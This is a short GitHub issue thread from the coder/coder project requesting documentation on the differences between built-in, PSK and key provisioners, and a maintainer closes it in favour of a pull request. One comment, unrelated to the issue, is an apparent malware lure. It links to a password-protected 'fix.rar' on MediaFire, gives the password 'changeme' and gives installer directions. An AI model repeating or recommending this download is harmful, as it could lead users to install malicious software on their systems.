### ISSUE TITLE
docs: add docs explaining the differences between built-in, psk, and key provisioners

### ISSUE THREAD

**Issue by aslilac** [coder/coder#14440]
There are some weird quirks, like which types can be assigned to which organizations, and it could be a bit confusing to a user, who doesn't realize they have built-in provisioners running for the default org, why suddenly they have to care about provisioners. A good bit of documentation explaining the differences and _why_ we've set things up this way would be very helpful.

**Comment by dseynhae** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by bpmct** [comment]
Closing in favor of https://github.com/coder/coder/pull/14778
